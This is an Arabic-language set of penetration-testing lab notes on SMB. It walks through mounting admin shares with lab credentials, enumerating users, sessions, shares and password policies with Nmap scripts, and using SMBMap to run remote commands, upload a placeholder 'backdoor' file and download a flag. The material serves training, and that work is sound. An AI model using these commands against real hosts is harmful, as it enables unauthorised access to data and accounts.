4. 📁 لابات SMB/Samba (مشاركة الملفات على Windows و Linux)

4.1 💻 لاب: Windows Recon – SMB Discover and Mount Lab

🎯 الهدف الأساسي:

اكتشاف مشاركات SMB (SMB Shares) على نظام Windows Server 2012، ثم ربطها (Mount) على نظام Windows المهاجم باستخدام بيانات اعتماد معروفة (في هذا اللاب)، والوصول إلى محتوياتها.

🔧 الخطوات العملية للاستغلال:

اكتشاف منافذ SMB/Samba المفتوحة:
- لو أردت التحقق من أن منفذ SMB يعمل على الجهاز المستهدف:
  nmap -p 445 <Target_IP>
  🔍 إشارة تنبيه: المنفذ 445 مفتوح يعني أن خدمة SMB تعمل على الجهاز المستهدف.
ربط مشاركات الشبكة (Mount Shared Drive) عبر الواجهة الرسومية (GUI) (Windows Attacker):
- لو حصلت على بيانات اعتماد (مثال: Administrator:SMBserver_771) لجهاز Windows Target:
  - افتح File Explorer (ستكشف الملفات) في نظام Windows المهاجم.
  - انقر بزر الماوس الأيمن على "Network" أو "This PC" (هذا الكمبيوتر)، ثم اختر "Map network drive..." (ربط محرك أقراص الشبكة).
  - في حقل "Folder"، اكتب المسار الكامل للمشاركة (مثلاً \\<Target_IP>\C$). تأكد من استخدام \\ (باك سلاش) في البداية.
  - عندما يطلب النظام المصادقة، أدخل بيانات الاعتماد التي حصلت عليها (مثلاً Administrator و SMBserver_771).
  - اختر المشاركة المراد ربطها (مثلاً C$) ثم انقر "Finish".
  - الآن، ستظهر المشاركة كـ "Network Drive" في File Explorer، ويمكنك تصفح محتوياتها كما لو كانت محرك أقراص محلي. 🔗 ربط سلسلة الأدوات: بمجرد الربط، يمكنك استخدام أدوات Windows المعتادة لتصفح الملفات والبحث عن الفلاجات. 🔍 إشارة تنبيه: ربط محرك أقراص الشبكة يوفر وصولاً سهلاً ومباشراً إلى الملفات المشتركة، وهو بمثابة الحصول على وصول أولي للجهاز.
ربط مشاركات الشبكة (Mount Shared Drive) عبر سطر الأوامر (CLI) (Windows Attacker):
- لو أردت القيام بنفس عملية الربط من خلال Command Prompt أو PowerShell:
  - أولاً، لإزالة أي اتصالات سابقة (موصى به):
    net use * /delete /y
    🔍 إشارة تنبيه: هذا الأمر يمسح جميع الاتصالات السابقة ويضمن عدم وجود تعارض.
  - لربط مشاركة (مثلاً C$) بحرف محرك أقراص (مثلاً Z:):
    net use Z: \\<Target_IP>\C$ "SMBserver_771" /user:Administrator
    🔗 ربط سلسلة الأدوات: بعد تنفيذ هذا الأمر، ستظهر المشاركة كـ Z: في File Explorer، مما يتيح لك التفاعل معها..

🚀 سيناريو تحدي: تصفح ملفات `Bob` في مشاركة `C$` بعد الربط:

الهدف: بعد ربط مشاركة C$ بنجاح، قم بتصفح محتويات مجلد المستخدم Bob (إذا كان موجوداً ضمن المشاركة) وابحث عن ملفات مهمة.

الخطوات (بعد ربط C$ كـ Z: باستخدام net use):
1. لو ربطت المشاركة C$ كـ Z: على جهازك:
2. افتح Command Prompt واكتب:
  dir Z:\Users\Bob\
3. لو وجدت مجلد Documents، ادخل إليه وقم بسرد محتوياته:
  cd Z:\Users\Bob\Documents\ dir
4. لو وجدت ملف secret_notes.txt، اقرأ محتواه:
  type secret_notes.txt

4.2 💻 لاب: Windows Recon – SMB Nmap Scripts Lab

🎯 الهدف الأساسي:

استخدام سكريبتات Nmap لتعداد معلومات مفصلة عن خدمة SMB على نظام Windows، بما في ذلك إصدارات البروتوكول، مستوى الأمان، الجلسات النشطة، المشاركات، المستخدمين، النطاقات، والمجموعات، مما يكشف عن نقاط ضعف محتملة.

🔧 الخطوات العملية للاستغلال:

تحديد إصدار SMB وبروتوكولاته ومستوى الأمان:
- لو أردت تحديد إصدارات وبروتوكولات SMB المدعومة بواسطة الخادم، ومستوى الأمان الخاص به:
  nmap -p 445 --script smb-protocols <Target_IP> nmap -p 445 --script smb-security-mode <Target_IP>
  🔍 إشارة تنبيه: إذا كانت النتيجة "Dangerous" أو "SMBv1" أو تسمح بدخول Guest/Anonymous، فهذه نقطة ضعف رئيسية للاستغلال.
تعداد الجلسات النشطة (Active Sessions):
- لو أردت معرفة من يقوم بتسجيل الدخول حالياً على الجهاز المستهدف (بما في ذلك كـ Guest إذا سمحت الإعدادات):
  nmap -p 445 --script smb-enum-sessions <Target_IP>
  🔗 ربط سلسلة الأدوات: ناتج هذا الأمر (مثال: مستخدم Bob عامل لوجن) يوفر أسماء مستخدمين قد تستخدم في هجمات القاموس. 🔍 إشارة تنبيه: الحصول على معلومات حول المستخدمين النشطين كـ Guest هو مؤشر على إعدادات SMB ضعيفة.
- لو فشل التعداد كـ Guest (أي لم تظهر الجلسات)، يمكنك إعادة المحاولة باستخدام بيانات اعتماد معروفة (مثال: Administrator:SMBserver_771):
  nmap -p 445 --script smb-enum-sessions --script-args "smbuser=Administrator,smbpass=SMBserver_771" <Target_IP>
  🔍 إشارة تنبيه: استخدام بيانات الاعتماد يمكن أن يكشف عن معلومات أكثر دقة ويوفر وصولاً أفضل.
تعداد المشاركات (Shares) وصلاحياتها:
- لو أردت سرد جميع المجلدات والملفات المشتركة على الجهاز المستهدف، وتحديد صلاحيات الوصول عليها (READ/WRITE):
  nmap -p 445 --script smb-enum-shares <Target_IP>
  🔗 ربط سلسلة الأدوات: هذا الأمر سيكشف عن مشاركات قابلة للكتابة (Read/Write) مثل IPC$ أو مشاركات أخرى، والتي يمكن استغلالها لتحميل ملفات خبيثة أو تنزيل ملفات حساسة. 🔍 إشارة تنبيه: المشاركات التي تسمح بـ "READ, WRITE" (قراءة وكتابة) هي نقاط ضعف حرجة تسمح بالسيطرة على الملفات.
- لتعداد المشاركات باستخدام بيانات اعتماد (في حال فشل الوصول كـ Guest):
  nmap -p 445 --script smb-enum-shares --script-args "smbuser=Administrator,smbpass=SMBserver_771" <Target_IP>
  🔍 إشارة تنبيه: غالباً ما يكشف الدخول ببيانات اعتماد عن صلاحيات أوسع (مثال: READ/WRITE على C$ أو ADMIN$).
تعداد المستخدمين (Users) والمجموعات (Groups) والدومينات (Domains):
- لو أردت سرد جميع المستخدمين المسجلين على الجهاز المستهدف:
  nmap -p 445 --script smb-enum-users --script-args "smbuser=Administrator,smbpass=SMBserver_771" <Target_IP>
  🔍 إشارة تنبيه: تعداد المستخدمين (مثال: Administrator, Bob, Guest) هو خطوة مهمة جداً لهجمات القاموس أو لتحديد الحسابات المستهدفة.
- لو أردت تعداد المجموعات الأمنية (Groups) وأعضائها:
  nmap -p 445 --script smb-enum-groups --script-args "smbuser=Administrator,smbpass=SMBserver_771" <Target_IP>
  🔍 إشارة تنبيه: معرفة المجموعات (مثال: Administrators، Users) وأعضائها يمكن أن يكشف عن مستخدمين ذوي صلاحيات عالية.
- لو أردت تحديد اسم الدومين أو Workgroup الذي ينتمي إليه الجهاز، وسياسات كلمات المرور (Password Policies):
  nmap -p 445 --script smb-enum-domains --script-args "smbuser=Administrator,smbpass=SMBserver_771" <Target_IP>
  🔍 إشارة تنبيه: سياسات كلمات المرور (مثال: Account lockout disabled، Password expires in 42 days) هي معلومات ذهبية لهجمات القوة الغاشمة (Brute-Force) أو لتخطيط الهجمات.
تعداد الخدمات (Services) وسرد محتويات المشاركات (LS):
- لو أردت سرد جميع الخدمات التي تعمل على الجهاز المستهدف:
  nmap -p 445 --script smb-enum-services --script-args "smbuser=Administrator,smbpass=SMBserver_771" <Target_IP>
  🔍 إشارة تنبيه: معرفة الخدمات (مثال: Amazon SSM Agent) قد يكشف عن برامج مثبّتة يمكن استغلالها.
- لو أردت سرد محتويات المشاركات المكتشفة:
  nmap -p 445 --script smb-ls --script-args "smbuser=Administrator,smbpass=SMBserver_771" <Target_IP>
  🔗 ربط سلسلة الأدوات: smb-ls يدخل إلى كل مشاركة ويكشف عن محتوياتها الداخلية، مما يسهل البحث عن الفلاجات أو الملفات الحساسة.

🚀 سيناريو تحدي: اكتشاف مستخدمي النظام وسياسة كلمات المرور:

الهدف: استخدم Nmap Scripts لكشف قائمة بجميع المستخدمين المسجلين على الجهاز المستهدف، ثم استخرج سياسات كلمات المرور الخاصة بالدومين/الوركروب.

الخطوات:
1. لو حصلت على بيانات اعتماد (Administrator:SMBserver_771):
2. اكتشف جميع المستخدمين المسجلين:
  nmap -p 445 --script smb-enum-users --script-args "smbuser=Administrator,smbpass=SMBserver_771" <Target_IP>
3. استخرج سياسات كلمات المرور والدومين/الوركجروب:
  nmap -p 445 --script smb-enum-domains --script-args "smbuser=Administrator,smbpass=SMBserver_771" <Target_IP>
  - 🔍 إشارة تنبيه: ابحث في الناتج عن Account lockout disabled أو Password expires in X days.

4.3 💻 لاب: Windows Recon – SMBMap Lab

🎯 الهدف الأساسي:

استخدام أداة SMBMap (تطبيق خارجي) لتعداد مشاركات SMB وصلاحياتها، ثم استغلال صلاحيات الكتابة (Write) لتنفيذ الأوامر عن بُعد، وتحميل (Upload) الملفات، وتنزيل (Download) الفلاجات من الجهاز المستهدف.

🔧 الخطوات العملية للاستغلال:

سرد المشاركات وصلاحياتها باستخدام SMBMap:
- لو أردت تعداد المشاركات المتاحة وصلاحياتها (READ/WRITE) باستخدام بيانات اعتماد (مثلاً admin:password1):
  smbmap -H <Target_IP> -u admin -p password1
  🔍 إشارة تنبيه: ابحث عن المشاركات التي لديها صلاحية "READ, WRITE"، فهي مفتاح الاستغلال.
تنفيذ أمر عن بُعد (Remote Command Execution) على الجهاز المستهدف:
- لو اكتشفت أن SMBv1 يعمل وكان دينجراس، أو كانت هناك صلاحيات تسمح بتنفيذ الأوامر عن بُعد:
  smbmap -H <Target_IP> -u admin -p password1 -x "ipconfig" # مثال آخر: smbmap -H <Target_IP> -u admin -p password1 -x "dir C:\"
  🔗 ربط سلسلة الأدوات: ناتج أمر ipconfig سيعرض معلومات شبكة الجهاز المستهدف. أمر dir C:\ سيسرد محتويات القرص C:، وقد يكشف عن ملفات فلاج. 🔍 إشارة تنبيه: خاصية تنفيذ الأوامر عن بُعد (-x) في SMBMap تستغل نقاط الضعف في SMBv1 أو إعدادات غير آمنة تسمح بذلك، وتعتبر فولنربيلتي خطيرة جداً.
تحميل ملف (Upload File) إلى الجهاز المستهدف:
- لو أردت تحميل ملف (مثلاً backdoor.txt) من جهازك المحلي إلى مشاركة قابلة للكتابة (مثلاً C$):
  - أولاً، أنشئ ملف "Backdoor" محلي (مثال: backdoor.txt):
    touch backdoor.txt
  - قم بتحميل الملف باستخدام SMBMap:
    smbmap -H <Target_IP> -u admin -p password1 --upload /root/backdoor.txt C$\backdoor.txt
    🔍 إشارة تنبيه: هذه الخطوة تتطلب أن يكون لديك صلاحية "WRITE" (الكتابة) على المشاركة المستهدفة (مثلاً C$ أو ADMIN$).
تنزيل ملف (Download File) من الجهاز المستهدف:
- لو أردت تنزيل ملف (Flag) من الجهاز المستهدف (مثلاً C:\flag.txt) إلى جهازك المحلي:
  - بعد اكتشاف ملف الفلاج (مثلاً C:\flag.txt) باستخدام أمر dir C:\ عبر smbmap -x:
    smbmap -H <Target_IP> -u admin -p password1 --download C$\flag.txt /root/flag.txt
    🔗 ربط سلسلة الأدوات: بعد التنزيل، يمكنك قراءة محتوى الفلاج على جهازك المحلي باستخدام cat.
    cat /root/flag.txt
    🔍 إشارة تنبيه: هذه الخطوة تتطلب أن يكون لديك صلاحية "READ" (القراءة) على المشاركة المستهدفة.

🚀 سيناريو تحدي: تنفيذ أمر، تحميل، وتنزيل فلاج باستخدام SMBMap:

الهدف: استخدم SMBMap لتنفيذ أمر ipconfig على الجهاز المستهدف، ثم قم بتحميل ملف "Backdoor" إلى مشاركة C$، وأخيراً قم بتنزيل ملف flag.txt وقراءته.

الخطوات:
1. لو حصلت على بيانات اعتماد (admin:password1):
2. نفذ أمر ipconfig عن بعد:
  smbmap -H <Target_IP> -u admin -p password1 -x "ipconfig"
3. أنشئ ملف "Backdoor" محلي:
  touch backdoor.txt
4. حمّل ملف "Backdoor" إلى C$:
  smbmap -H <Target_IP> -u admin -p password1 --upload /root/backdoor.txt C$\backdoor.txt
5. ابحث عن flag.txt (إذا لم تعرف مساره) باستخدام أمر dir C:\ عن بعد:
  smbmap -H <Target_IP> -u admin -p password1 -x "dir C:\"
6. نزّل ملف flag.txt:
  smbmap -H <Target_IP> -u admin -p password1 --download C$\flag.txt /root/flag.txt
7. اقرأ الفلاج:
  cat /root/flag.txt

Previous3. 🛡️ لابات SSH (Secure Shell)Next5. 🌐 لابات HTTP (خوادم الويب: IIS و Apache)

Last updated 4 months ago

hashtag4.1 💻 لاب: Windows Recon – SMB Discover and Mount Lab

hashtag🎯 الهدف الأساسي:

hashtag🔧 الخطوات العملية للاستغلال:

hashtag🚀 سيناريو تحدي: تصفح ملفات Bob في مشاركة C$ بعد الربط:

hashtag4.2 💻 لاب: Windows Recon – SMB Nmap Scripts Lab

hashtag🎯 الهدف الأساسي:

hashtag🔧 الخطوات العملية للاستغلال:

hashtag🚀 سيناريو تحدي: اكتشاف مستخدمي النظام وسياسة كلمات المرور:

hashtag4.3 💻 لاب: Windows Recon – SMBMap Lab

hashtag🎯 الهدف الأساسي:

hashtag🔧 الخطوات العملية للاستغلال:

hashtag🚀 سيناريو تحدي: تنفيذ أمر، تحميل، وتنزيل فلاج باستخدام SMBMap:

4.1 💻 لاب: Windows Recon – SMB Discover and Mount Lab

🎯 الهدف الأساسي:

🔧 الخطوات العملية للاستغلال:

🚀 سيناريو تحدي: تصفح ملفات `Bob` في مشاركة `C$` بعد الربط:

4.2 💻 لاب: Windows Recon – SMB Nmap Scripts Lab

🎯 الهدف الأساسي:

🔧 الخطوات العملية للاستغلال:

🚀 سيناريو تحدي: اكتشاف مستخدمي النظام وسياسة كلمات المرور:

4.3 💻 لاب: Windows Recon – SMBMap Lab

🎯 الهدف الأساسي:

🔧 الخطوات العملية للاستغلال:

🚀 سيناريو تحدي: تنفيذ أمر، تحميل، وتنزيل فلاج باستخدام SMBMap: